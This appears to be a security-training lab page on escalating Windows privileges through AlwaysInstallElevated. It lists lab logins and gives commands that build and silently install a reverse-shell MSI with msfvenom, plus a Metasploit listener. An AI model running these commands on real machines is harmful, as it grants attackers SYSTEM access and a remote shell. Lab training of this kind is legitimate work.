⚠️ Pracivo Security Lab — Windows privilege escalation techniques. Start as low-privilege user, escalate to SYSTEM or Administrator.
Lab Credentials: ram / pracivo | alice / alice123 | administrator / Admin@2024 (goal: escalate to this)
AlwaysInstallElevated
PRIVILEGE ESCALATION
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.1 LPORT=4444 -f msi -o evil.msi
msiexec /quiet /qn /i evil.msi
use exploit/multi/handler
set payload windows/x64/shell_reverse_tcp
set LHOST 10.10.10.1
set LPORT 4444
run
Get-RegistryAlwaysInstallElevated